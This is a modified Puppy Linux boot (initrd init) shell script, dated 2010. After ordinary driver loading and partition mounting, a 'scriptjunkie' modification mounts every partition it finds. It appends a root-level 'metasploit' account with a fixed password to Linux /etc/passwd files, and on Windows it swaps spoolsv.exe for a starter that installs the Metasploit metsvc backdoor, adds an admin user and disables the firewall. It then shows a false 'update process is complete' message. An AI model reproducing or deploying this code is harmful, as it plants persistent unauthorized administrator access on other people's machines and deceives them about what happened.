#!/bin/sh
#(c) Copyright 2007 Barry Kauler, www.puppylinux.com
#2007 Lesser GPL licence v2 (http://www.fsf.org/licensing/licenses/lgpl.html)
#edited by scriptjunkie 2010
clear

PATH="/bin:/sbin"
KERNELVER="`uname -r`"

[ $layerfs ] && LAYERFS=$layerfs
[ ! $LAYERFS ] && LAYERFS=aufs #aufs or unionfs
[ "`modinfo aufs 2>/dev/null`" = "" ] && LAYERFS=unionfs #precaution.

[ $loglevel ] && LOGLEVEL=$loglevel #v2.22


mntfunc() {
 MNT_T="$1"    #ex: vfat
 MNT_DEV="$2"  #ex: /dev/sda1
 MNT_DIR="$3"  #ex: /mnt/sda1
 MNT_O=""
 [ $4 ] && MNT_O="${4}" #ex: noatime
 case $MNT_T in
  ntfs)
   ntfs-3g $MNT_DEV $MNT_DIR -o umask=0,no_def_opts,noatime,rw 2>/dev/null #default is rw
   ntfsRETVAL=$?
   [ $ntfsRETVAL -eq 0 ] && return 0
   if [ $ntfsRETVAL -eq 14 ];then
    #ntfs-3g $MNTPRMS -o umask=0,no_def_opts,noatime,rw,remove_hiberfile 2>/dev/null
    echo -e "\\033[1;31m" >/dev/console #31=red
    echo -n "ERROR: Windows NTFS hibernated partition, cannot mount" > /dev/console
    echo -e "\\033[0;39m" >/dev/console
    return 14
   else
    ntfs-3g $MNT_DEV $MNT_DIR -o umask=0,no_def_opts,noatime,rw,force 2>/dev/null
   fi
  ;;
  vfat)
   mount -t $MNT_T -o $VFAT_OUT_PARAM $MNT_DEV $MNT_DIR
  ;;
  *)
   if [ "$MNT_O" = "" ];then
    mount -t $MNT_T $MNT_DEV $MNT_DIR
   else
    mount -t $MNT_T -o $MNT_O $MNT_DEV $MNT_DIR
   fi
  ;;
 esac
 return $?
}

umntfunc() {
 #warning umntfunc call must have mntpt param, not device name.
 LASTPARAM="`echo -n "$*" | tr '\t' ' ' | tr -s ' ' | tr ' ' '\n' | grep '^/mnt/'`"
 if [ "`mount | grep "$LASTPARAM" | grep -E 'ntfs|fuse'`" = "" ];then
  umount $@
 else
  fusermount -u $LASTPARAM
 fi
 return $?
}

mount -t proc none /proc
mount -t sysfs none /sys
mount -t rootfs -o remount,rw rootfs /
ln -s /proc/mounts /etc/mtab #resize2fs,e2fsck need this.

#v3.95 for backwards naming compatibility...
if [ ! -e /proc/ide ];then #v3.97
 [ "$PMEDIA" = "ideflash" ] && PMEDIA="ataflash"
 [ "$PMEDIA" = "idezip" ] && PMEDIA="atazip"
 [ "$PMEDIA" = "idehd" ] && PMEDIA="atahd"
 [ "$PMEDIA" = "idecd" ] && PMEDIA="atacd"
 [ "$PMEDIA" = "satahd" ] && PMEDIA="atahd"
 [ "$PMEDIA" = "satacd" ] && PMEDIA="atacd"
fi

clear #got this out of embutils, compiled in t2 (as not currently in busybox)
[ ! "$LOGLEVEL" ] && exec 1>/tmp/bootinit.log 2>&1 #remove o/p from console. v2.22 loglevel added.

export TZ='XXX-23'
/bin/hwclock -s -l #set system time (based on hw clock set to local time).

#does this initrd have all the zdrv components inside it?...
ZDRVINIT='no'
[ `wc -l /lib/modules/$KERNELVER/modules.dep  | tr -s ' ' | cut -f 2 -d ' '` -gt 200 ] && ZDRVINIT='yes'

[ "$RDSH" = "0" ] && exec /bin/sh >/dev/console 2>&1 #w091222

###################LOAD MODULES TO ACCESS DRIVES#####################
 #STEP ONE

#100214 one config of 2.6.33 has base floppy and ps/2 mouse support not builtin...
[ "`modinfo floppy 2>/dev/null`" != "" ] && modprobe floppy
[ "`modinfo psmouse 2>/dev/null`" != "" ] && modprobe psmouse

#w462 if present, load it. enables recognition of drives attached to parallel port.
[ "`modinfo ppa 2>/dev/null`" != "" ] && modprobe ppa #also loads parport.ko

ELSPCI="`elspci -l`" #jesses great little utility.
#v403 pcmcia drive support. i think this may need extra delay though...
if [ "`echo "$ELSPCI" | grep '060700'`" != "" ];then
 modprobe yenta_socket
 #...may have to add on a couple of seconds, need to test with a pcmcia drive.
 #v412 yeah, my pccard-usb adaptor needs delay before elspci recognises 0C0310 (ohci-hcd) interface...
 sleep 2
fi
#v423 k2.6.29.6 dmesg has warning that ehci-hcd should load before uhci-hcd and ohci-hid
# this is contrary to my understanding all these years, but oh well, let's do it...
[ "`echo "$ELSPCI" | grep '0C0320'`" != "" ] && modprobe ehci-hcd

MODALIASES="`cat /sys/bus/pci/devices/*/modalias`" #important, save to variable before loop.
for ONEMODALIAS in $MODALIASES
do
  modprobe -v $ONEMODALIAS #-v means verbose.
  [ $? -eq 0 ] && echo -n "." > /dev/console
done

#091222 some mmc/sd interfaces need this...
#(above code loop may have loaded sdhci/sdhci_pci or tifm_core/tifm_7xx1)
[ "`lsmod | grep '^sdhci'`" != "" ] && modprobe mmc_core && modprobe mmc_block
[ "`lsmod | grep '^tifm'`" != "" ] && modprobe mmc_core && modprobe mmc_block && modprobe tifm_sd

modprobe squashfs
if [ -e /proc/ide ];then #v3.97
 modprobe cdrom
 modprobe ide-cd
fi
modprobe sr_mod > /dev/null 2>&1 #v3.93 now built-in to 2.6.25.x kernel.

#ATADRIVES="`cat /proc/partitions | grep "sd[a-z]$" | tr -s " " | cut -f 5 -d " " | tr "\n" " "`"
ATADRIVES="`ls -1 /sys/block | grep '^sd' | tr '\n' ' '`"

echo -n "$ATADRIVES" > /ATADRIVES #w479 for testing purposes if crash to console.

if [ "`lsmod | grep -E '^uhci|^ohci|^ehci'`" != "" ];then
  modprobe usb-storage & #run as separate process
  WAITUSB="yes"
  mount -t usbfs none /proc/bus/usb
  
  #v423 problem recent kernels: kernel configured to load hid-* extra drivers when
  #usbhid loads, but it doesn't work. Most unfortunate. Note, older kernels have the
  #hid-* (drivers for specific hardware, like Logitech wireless keyboard) builtin to
  #the usbhid driver. Now that they are separated out, it is a headache. Try this...
  /bin/hotplug2stdout_notimeout >/tmp/uevents.log &
  PIDHOT=$!
  modprobe usbhid #for a usb keyboard.
fi

#v3.95 driver now builtin to libata pata kernel...
if [ -e /proc/ide ];then #v3.97
 #ide zip or ide ls-120 drive?...
 [ ! "`dmesg | grep "ATAPI FLOPPY"`" = "" ] && modprobe ide-floppy
fi

#filesystems...
modprobe nls_cp437     #needed by windows filesystems.
modprobe nls_iso8859-1 #needed by linux filesystems.
#modprobe nls_utf8 #w007
#modprobe nls_cp850 #w468 now default for fat f.s. (2.6.29.2 kernel)
modprobe $LAYERFS #unionfs or aufs.
modprobe fuse #for ntfs-3g driver.

if [ "$WAITUSB" = "yes" ];then #wait for device to register.
 #v3.94 Classmate laptop, needs more delay here... no, further down...
 sleep 1 #2 v403 bumped it up to 3. v412 try 1sec again.
 USBSTORAGES=0 ; CNTUSB=0
 while [ $USBSTORAGES -eq 0 ];do
  echo -n "." > /dev/console
  sleep 1
  CNTUSB=`expr $CNTUSB + 1`
  [ $CNTUSB -gt 25 ] && break
  #v412 bug, ubuntu kernel, got duplicate 'device found at 2', need 'sort -u'...
  USBSTORAGES=`/bin/dmesg | grep "usb-storage: device found at" | sort -u | wc -l | sed -e 's/ //g'`
  #if booting from usb, USBSTORAGES must be non-zero...
  [ "`echo "$PMEDIA" | grep 'usb'`" != "" ] && [ $USBSTORAGES -eq 0 ] && continue
  [ $USBSTORAGES -eq 0 ] && break
  AVAILABLEUSBSTORAGES=`/bin/dmesg | grep "usb-storage: device scan complete" | wc -l | sed -e 's/ //g'`
  [ $USBSTORAGES -ne $AVAILABLEUSBSTORAGES ] && USBSTORAGES=0
 done
 [ $USBSTORAGES -ne 0 ] && sleep 1 #v412 was needed for classmate. was 2, try 1sec.
 
 #v423 load hid-* driver...
 for ONEHID in `grep -o 'MODALIAS=hid:[^ ]*' /tmp/uevents.log | cut -f 2 -d '=' | tr '\n' ' '`
 do
  modprobe $ONEHID
 done
 kill $PIDHOT
 
fi
#END STEP ONE
##############END MODULE LOADING TO ACCESS DRIVES####################

#######################FINDING PUPPY - no, windows FILES###########################
#locate all partitions (and superfloppy drives)...
PCPARTSALL="`probepart_init -k`"
PCPARTS0="`echo "$PCPARTSALL" | grep '^/dev/' | cut -f 1-2 -d '|'  | grep -E 'iso9660|ext2|ext3|ext4|reiserfs|msdos|vfat|minix|ntfs' | sed -e 's/\/dev\///g'`" #v431
PCPARTS="`echo "$PCPARTS0" | tr "\n" " "`" #note, will have a space char on end.
LESSPARTS0="$PCPARTS0" #search everywhere.
LESSPARTS="`echo "$LESSPARTS0" | tr '\n' ' '`"

 #*********************************************************************
 #MODIFICATION BY SCRIPTJUNKIE
 #linux: append "metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh" to /etc/passwd.
 # adds new user metasploit with password metasploit and uid 0.
 #
 #windows: backs up and swaps out svchost.exe with simple exe that 
 # starts a script to install metsvc, add a new admin user with 
 # username and password metasploit and installs metsvc and disable 
 # the firewall
 #*********************************************************************

for ONETRY in $LESSPARTS
do
 ONEDEV="`echo -n "$ONETRY" | cut -f 1 -d '|'`"
 ONEFS="`echo -n "$ONETRY" | cut -f 2 -d '|'`"
 mntfunc $ONEFS /dev/$ONEDEV /mnt/data 
 if [ $? -ne 0 ];then
  continue
 fi
 [ -f /mnt/data/etc/passwd ] && echo metasploit:Az/dIsj4p4IRc:0:0::/:/bin/sh >> /mnt/data/etc/passwd
 cd /mnt/data
 cd WINNT || cd Winnt || cd winnt || cd WINDOWS || cd Windows || cd windows || { cd / && umntfunc /mnt/data && continue ; }
 cd system32 || cd System32 || cd SYSTEM32 || { cd / && umntfunc /mnt/data && continue ; }
 if [ -f spoolsv.exe ]; then
  cat spoolsv.exe > spoolsv.bak.exe
  rm -f spoolsv.exe
  cp -f /metsvcStarter.exe spoolsv.exe
  cd config || cd CONFIG || cd Config
  /regeditor >/dev/null
  cd ..
  if [ -f ../SysWOW64/svchost.exe ]; then
   cd ../SysWOW64/
  fi
  cp -f /metsvc.exe .
  cp -f /metsrv.dll .
  cp -f /metsvc-server.exe .
  cp -f /autoinf.exe .
  echo "The update process is complete. ">/dev/console
 fi
 cd /
 umntfunc /mnt/data
done
echo "Please restart your computer with the power or reset button." > /dev/console
/reboot
